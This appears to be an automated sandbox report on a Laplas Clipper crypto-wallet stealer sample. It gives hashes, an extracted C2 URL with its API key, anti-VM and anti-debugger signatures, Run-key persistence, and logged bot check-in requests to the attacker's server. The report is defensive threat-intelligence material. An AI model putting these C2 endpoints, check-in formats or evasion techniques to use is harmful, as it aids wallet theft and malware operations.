Analysis

  • max time kernel
    139s
  • max time network
    154s
  • platform
    windows7_x64
  • resource
    win7-20230703-en
  • resource tags
    arch:x64, arch:x86, image:win7-20230703-en, locale:en-us, os:windows7-x64, system
  • submitted
    10/07/2023, 06:33 UTC

General

  • Target

    f2e100f576b44fdb37d874db2e48085c.exe

  • Size

    4.4MB

  • MD5

    f2e100f576b44fdb37d874db2e48085c

  • SHA1

    23091a0b5231d69d85866fede573b25577e20414

  • SHA256

    77530f67cff4fc2456c0b27abf28d1ab1f4f10fd9be039783adfa25ed1f7f196

  • SHA512

    14bd861a48f201a195d322e4c00f758996d2be8b6d78a1c927af53a00e029e9be7db4002c48a80f88d2869e9ba412724ec7a47c8da09faf79133df2edc608f85

  • SSDEEP

    98304:fqemq9DObUSOLZ27MJuUfg7Jb/0RCh2fc/xVzVALUx:PzD3SFEuUfcLwCh2Q/RAY

Malware Config

Extracted

Family

laplas

C2

http://lpls.tuktuk.ug

Attributes
  • api_key

    a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde

Signatures

  • Laplas Clipper

    Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f2e100f576b44fdb37d874db2e48085c.exe
    "C:\Users\Admin\AppData\Local\Temp\f2e100f576b44fdb37d874db2e48085c.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Loads dropped DLL
    • Adds Run key to start application
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of WriteProcessMemory
    PID:3064
    • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
      C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:2256

Network

  • US
    DNS
    lpls.tuktuk.ug
    ntlhost.exe
    Remote address:
    8.8.8.8:53
    Request
    lpls.tuktuk.ug
    IN A
    Response
    lpls.tuktuk.ug
    IN A
    45.66.230.149
  • NL
    GET
    http://lpls.tuktuk.ug/bot/regex
    ntlhost.exe
    Remote address:
    45.66.230.149:80
    Request
    GET /bot/regex HTTP/1.1
    Host: lpls.tuktuk.ug
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Mon, 10 Jul 2023 06:33:27 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 633
    Connection: keep-alive
  • NL
    GET
    http://lpls.tuktuk.ug/bot/online?key=a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde&guid=KOSNGVQI\Admin
    ntlhost.exe
    Remote address:
    45.66.230.149:80
    Request
    GET /bot/online?key=a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde&guid=KOSNGVQI\Admin HTTP/1.1
    Host: lpls.tuktuk.ug
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Mon, 10 Jul 2023 06:33:28 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 2
    Connection: keep-alive
  • NL
    GET
    http://lpls.tuktuk.ug/bot/regex
    ntlhost.exe
    Remote address:
    45.66.230.149:80
    Request
    GET /bot/regex HTTP/1.1
    Host: lpls.tuktuk.ug
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Mon, 10 Jul 2023 06:34:33 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 633
    Connection: keep-alive
  • NL
    GET
    http://lpls.tuktuk.ug/bot/online?key=a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde&guid=KOSNGVQI\Admin
    ntlhost.exe
    Remote address:
    45.66.230.149:80
    Request
    GET /bot/online?key=a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde&guid=KOSNGVQI\Admin HTTP/1.1
    Host: lpls.tuktuk.ug
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Mon, 10 Jul 2023 06:34:33 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 2
    Connection: keep-alive
  • NL
    GET
    http://lpls.tuktuk.ug/bot/regex
    ntlhost.exe
    Remote address:
    45.66.230.149:80
    Request
    GET /bot/regex HTTP/1.1
    Host: lpls.tuktuk.ug
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Mon, 10 Jul 2023 06:35:39 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 633
    Connection: keep-alive
  • NL
    GET
    http://lpls.tuktuk.ug/bot/online?key=a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde&guid=KOSNGVQI\Admin
    ntlhost.exe
    Remote address:
    45.66.230.149:80
    Request
    GET /bot/online?key=a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde&guid=KOSNGVQI\Admin HTTP/1.1
    Host: lpls.tuktuk.ug
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Mon, 10 Jul 2023 06:35:39 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 2
    Connection: keep-alive
  • 45.66.230.149:80
    http://lpls.tuktuk.ug/bot/online?key=a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde&guid=KOSNGVQI\Admin
    http
    ntlhost.exe
    1.6kB
    4.3kB
    15
    20

    HTTP Request

    GET http://lpls.tuktuk.ug/bot/regex

    HTTP Response

    200

    HTTP Request

    GET http://lpls.tuktuk.ug/bot/online?key=a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde&guid=KOSNGVQI\Admin

    HTTP Response

    200

    HTTP Request

    GET http://lpls.tuktuk.ug/bot/regex

    HTTP Response

    200

    HTTP Request

    GET http://lpls.tuktuk.ug/bot/online?key=a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde&guid=KOSNGVQI\Admin

    HTTP Response

    200

    HTTP Request

    GET http://lpls.tuktuk.ug/bot/regex

    HTTP Response

    200

    HTTP Request

    GET http://lpls.tuktuk.ug/bot/online?key=a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde&guid=KOSNGVQI\Admin

    HTTP Response

    200
  • 8.8.8.8:53
    lpls.tuktuk.ug
    dns
    ntlhost.exe
    60 B
    76 B
    1
    1

    DNS Request

    lpls.tuktuk.ug

    DNS Response

    45.66.230.149

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

    Filesize

    743.4MB

    MD5

    3fbf49633fa76fe203f55b1cd98fe6ba

    SHA1

    3f8a742b348cbf8e09e2d12889ac81bcbc09b244

    SHA256

    3c50b55a724ee55cf876dc7f5feb3db45e568816e6fc4de799817d260b428e25

    SHA512

    a56b50ab9df26204cf1b78f19725351526bc93ba3b9286c473545c684e44c8341f0290ba4ce23a94f843ed2675a73e107ced8beb48e098698e0e2624ed5dcd48

  • \Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

    Filesize

    743.4MB

    MD5

    3fbf49633fa76fe203f55b1cd98fe6ba

    SHA1

    3f8a742b348cbf8e09e2d12889ac81bcbc09b244

    SHA256

    3c50b55a724ee55cf876dc7f5feb3db45e568816e6fc4de799817d260b428e25

    SHA512

    a56b50ab9df26204cf1b78f19725351526bc93ba3b9286c473545c684e44c8341f0290ba4ce23a94f843ed2675a73e107ced8beb48e098698e0e2624ed5dcd48

  • memory/2256-73-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/2256-79-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/2256-90-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/2256-89-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/2256-88-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/2256-87-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/2256-86-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/2256-85-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/2256-67-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/2256-68-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/2256-69-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/2256-71-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/2256-70-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/2256-72-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/2256-84-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/2256-75-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/2256-81-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/2256-76-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/2256-77-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/2256-78-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/2256-74-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/2256-80-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/3064-54-0x0000000000340000-0x0000000000C95000-memory.dmp

    Filesize

    9.3MB

  • memory/3064-58-0x0000000000340000-0x0000000000C95000-memory.dmp

    Filesize

    9.3MB

  • memory/3064-66-0x0000000000340000-0x0000000000C95000-memory.dmp

    Filesize

    9.3MB

  • memory/3064-55-0x0000000000340000-0x0000000000C95000-memory.dmp

    Filesize

    9.3MB

  • memory/3064-57-0x0000000000340000-0x0000000000C95000-memory.dmp

    Filesize

    9.3MB

  • memory/3064-60-0x0000000000340000-0x0000000000C95000-memory.dmp

    Filesize

    9.3MB

  • memory/3064-61-0x0000000000340000-0x0000000000C95000-memory.dmp

    Filesize

    9.3MB

  • memory/3064-59-0x0000000000340000-0x0000000000C95000-memory.dmp

    Filesize

    9.3MB